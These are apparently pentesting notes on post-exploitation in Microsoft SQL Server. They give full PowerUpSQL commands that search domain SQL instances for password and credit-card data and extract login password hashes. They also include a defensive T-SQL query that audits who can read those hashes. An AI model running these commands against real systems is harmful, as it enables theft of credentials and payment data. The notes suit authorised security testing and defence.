Post Exploitation
Finding Sensitive Info
Indicators of sensitive info include size, use of transparent encryption, names, etc.
For example, we can use this PowerUpSQL query to identify sensitive info based on names:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,money,password" -SampleSize 2 -ValidateCC -NoDefaults
Or with transparent encryption:
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} |
Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults
Extracting hashes
PowerUpSQL has a very useful function called Get-SQLServerPasswordHash that automates extracting hashes.
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\DATABASE -Migrate
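On the defensive side, the hashes this function reads live in sys.sql_logins.password_hash, which is only visible to principals holding CONTROL SERVER (sysadmin members hold it implicitly). The T-SQL below is an added example, not part of the original notes or of PowerUpSQL; it lists who can read the hashes and which SQL logins are exposed without password policy enforcement, so both sets can be reviewed and trimmed.

```sql
-- Added example for review on your own instance; not PowerUpSQL code.
-- 1) Principals able to read sys.sql_logins.password_hash:
--    sysadmin members and explicit CONTROL SERVER grantees.
SELECT  m.name            AS principal_name,
        m.type_desc       AS principal_type,
        m.is_disabled,
        'sysadmin member' AS access_path
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name = N'sysadmin'
UNION ALL
SELECT  g.name,
        g.type_desc,
        g.is_disabled,
        'CONTROL SERVER grant'
FROM    sys.server_permissions AS p
JOIN    sys.server_principals  AS g ON g.principal_id = p.grantee_principal_id
WHERE   p.class = 100                      -- server-level permission
  AND   p.permission_name = N'CONTROL SERVER'
  AND   p.state IN ('G', 'W')              -- GRANT or GRANT WITH GRANT OPTION
ORDER BY access_path, principal_name;

-- 2) SQL-authenticated logins whose hashes would be exposed, with the
--    settings that decide how long a recovered hash stays useful.
SELECT  name,
        is_disabled,
        is_policy_checked,       -- 0 = Windows password policy not enforced
        is_expiration_checked,   -- 0 = password never expires
        modify_date              -- last change to the login
FROM    sys.sql_logins
WHERE   is_policy_checked = 0
   OR   is_expiration_checked = 0
ORDER BY modify_date;
```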
Todo
Getting code execution via xp_cmdshell and sp_OACreate